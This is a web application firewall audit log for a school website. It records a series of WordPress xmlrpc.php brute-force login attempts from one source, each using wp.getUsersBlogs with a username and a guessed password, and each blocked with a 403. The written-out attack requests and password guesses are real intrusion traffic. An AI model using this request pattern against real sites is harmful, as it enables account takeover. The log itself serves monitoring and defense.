[25/Apr/2025:00:22:28 +0700] aApzVGLuk3f9kLjsdTaTTgAAAIU 103.236.140.4 42674 103.236.140.4 8181
--9f875364-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9f875364-C--
wp.getUsersBlogs
kajur
caonima123
--9f875364-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9f875364-E--
--9f875364-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515348232258 4768 (- - -)
Stopwatch2: 1745515348232258 4768; combined=3257, p1=410, p2=2704, p3=0, p4=0, p5=84, sr=89, sw=59, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9f875364-Z--
--f0c5b87e-A--
[25/Apr/2025:00:23:15 +0700] aApzg_iVYlyO1xhz7yPA1QAAAMI 103.236.140.4 43776 103.236.140.4 8181
--f0c5b87e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f0c5b87e-C--
wp.getUsersBlogs
kajur
1234%^&*
--f0c5b87e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f0c5b87e-E--
--f0c5b87e-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515395464117 5063 (- - -)
Stopwatch2: 1745515395464117 5063; combined=3566, p1=469, p2=2927, p3=0, p4=0, p5=101, sr=85, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f0c5b87e-Z--
--cec1637f-A--
[25/Apr/2025:00:23:28 +0700] aApzkPiVYlyO1xhz7yPBDQAAAMI 103.236.140.4 44104 103.236.140.4 8181
--cec1637f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--cec1637f-C--
wp.getUsersBlogs
kajur
qwe1234
--cec1637f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cec1637f-E--
--cec1637f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (118+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515408471033 5215 (- - -)
Stopwatch2: 1745515408471033 5215; combined=3722, p1=460, p2=3095, p3=0, p4=0, p5=98, sr=87, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cec1637f-Z--
--53a97b71-A--
[25/Apr/2025:00:24:28 +0700] aApzzN5yz20UX9VrdZPWDQAAAEA 103.236.140.4 45750 103.236.140.4 8181
--53a97b71-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--53a97b71-C--
wp.getUsersBlogs
kajur
asdfgh
--53a97b71-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--53a97b71-E--
--53a97b71-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (113+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515468259495 5306 (- - -)
Stopwatch2: 1745515468259495 5306; combined=3810, p1=446, p2=3169, p3=0, p4=0, p5=114, sr=90, sw=81, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--53a97b71-Z--
--8717b133-A--
[25/Apr/2025:00:25:28 +0700] aAp0CPiVYlyO1xhz7yPB6wAAAMY 103.236.140.4 47070 103.236.140.4 8181
--8717b133-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8717b133-C--
wp.getUsersBlogs
kajur
ladybug
--8717b133-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8717b133-E--
--8717b133-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515528199006 4863 (- - -)
Stopwatch2: 1745515528199006 4863; combined=3565, p1=476, p2=2915, p3=0, p4=0, p5=101, sr=156, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8717b133-Z--
--7c4e9370-A--
[25/Apr/2025:00:26:28 +0700] aAp0RN5yz20UX9VrdZPWsQAAAEs 103.236.140.4 48238 103.236.140.4 8181
--7c4e9370-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7c4e9370-C--
wp.getUsersBlogs
kesiswaan
kesiswaan2018
--7c4e9370-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7c4e9370-E--
--7c4e9370-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515588151143 5147 (- - -)
Stopwatch2: 1745515588151143 5147; combined=3645, p1=489, p2=2998, p3=0, p4=0, p5=93, sr=90, sw=65, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7c4e9370-Z--
--088f767e-A--
[25/Apr/2025:00:27:28 +0700] aAp0gGLuk3f9kLjsdTaU_QAAAIE 103.236.140.4 50070 103.236.140.4 8181
--088f767e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--088f767e-C--
wp.getUsersBlogs
kesiswaan
kesiswaan@1991
--088f767e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--088f767e-E--
--088f767e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (144+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515648332289 5247 (- - -)
Stopwatch2: 1745515648332289 5247; combined=3596, p1=430, p2=2962, p3=0, p4=0, p5=116, sr=86, sw=88, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--088f767e-Z--
--85b4372e-A--
[25/Apr/2025:00:28:28 +0700] aAp0vN5yz20UX9VrdZPXygAAAFY 103.236.140.4 53380 103.236.140.4 8181
--85b4372e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--85b4372e-C--
wp.getUsersBlogs
kesiswaan
Admin!@#
--85b4372e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--85b4372e-E--
--85b4372e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515708367973 4332 (- - -)
Stopwatch2: 1745515708367973 4332; combined=2955, p1=378, p2=2425, p3=0, p4=0, p5=90, sr=85, sw=62, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--85b4372e-Z--
--d43daf4f-A--
[25/Apr/2025:00:29:28 +0700] aAp0-PiVYlyO1xhz7yPFDgAAAMQ 103.236.140.4 56820 103.236.140.4 8181
--d43daf4f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d43daf4f-C--
wp.getUsersBlogs
kesiswaan
account
--d43daf4f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d43daf4f-E--
--d43daf4f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515768230581 5075 (- - -)
Stopwatch2: 1745515768230581 5075; combined=3417, p1=403, p2=2842, p3=0, p4=0, p5=99, sr=76, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d43daf4f-Z--
--e5c01021-A--
[25/Apr/2025:00:30:25 +0700] aAp1MWLuk3f9kLjsdTaXsQAAAJM 103.236.140.4 32976 103.236.140.4 8181
--e5c01021-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e5c01021-C--
wp.getUsersBlogs
kesiswaan
1234%^&*
--e5c01021-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e5c01021-E--
--e5c01021-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515825439492 4876 (- - -)
Stopwatch2: 1745515825439492 4876; combined=3284, p1=383, p2=2744, p3=0, p4=0, p5=94, sr=73, sw=63, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e5c01021-Z--
--1d633915-A--
[25/Apr/2025:00:30:28 +0700] aAp1NMlQo524fhbIj1ycqQAAABg 103.236.140.4 33200 103.236.140.4 8181
--1d633915-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--1d633915-C--
wp.getUsersBlogs
kesiswaan
a1s2d3f4
--1d633915-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1d633915-E--
--1d633915-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (150+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515828027862 4733 (- - -)
Stopwatch2: 1745515828027862 4733; combined=3369, p1=427, p2=2705, p3=0, p4=0, p5=132, sr=91, sw=105, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1d633915-Z--
--91557927-A--
[25/Apr/2025:00:31:28 +0700] aAp1cMlQo524fhbIj1yd0wAAABA 103.236.140.4 37512 103.236.140.4 8181
--91557927-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--91557927-C--
wp.getUsersBlogs
kesiswaan
anthony
--91557927-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--91557927-E--
--91557927-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515888022929 4144 (- - -)
Stopwatch2: 1745515888022929 4144; combined=2954, p1=385, p2=2438, p3=0, p4=0, p5=77, sr=80, sw=54, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--91557927-Z--
--e6051136-A--
[25/Apr/2025:00:32:28 +0700] aAp1rGLuk3f9kLjsdTaaKgAAAIE 103.236.140.4 42868 103.236.140.4 8181
--e6051136-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e6051136-C--
wp.getUsersBlogs
kesiswaan
tennis
--e6051136-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e6051136-E--
--e6051136-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (139+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515948275031 5090 (- - -)
Stopwatch2: 1745515948275031 5090; combined=3498, p1=468, p2=2858, p3=0, p4=0, p5=101, sr=83, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e6051136-Z--
--be5ff223-A--
[25/Apr/2025:00:33:28 +0700] aAp16GLuk3f9kLjsdTaazQAAAIQ 103.236.140.4 47864 103.236.140.4 8181
--be5ff223-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--be5ff223-C--
wp.getUsersBlogs
kesiswaan
mynoob
--be5ff223-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--be5ff223-E--
--be5ff223-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516008267834 4791 (- - -)
Stopwatch2: 1745516008267834 4791; combined=3282, p1=460, p2=2652, p3=0, p4=0, p5=97, sr=116, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--be5ff223-Z--
--2d7b161f-A--
[25/Apr/2025:00:34:28 +0700] aAp2JGLuk3f9kLjsdTab7wAAAI0 103.236.140.4 52188 103.236.140.4 8181
--2d7b161f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--2d7b161f-C--
wp.getUsersBlogs
timkreatif
1qazxsw2
--2d7b161f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2d7b161f-E--
--2d7b161f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (132+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516068214480 4554 (- - -)
Stopwatch2: 1745516068214480 4554; combined=3186, p1=388, p2=2651, p3=0, p4=0, p5=87, sr=72, sw=60, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2d7b161f-Z--
--a7a28d36-A--
[25/Apr/2025:00:35:28 +0700] aAp2YN5yz20UX9VrdZPffAAAAFM 103.236.140.4 56676 103.236.140.4 8181
--a7a28d36-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 233
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a7a28d36-C--
wp.getUsersBlogs
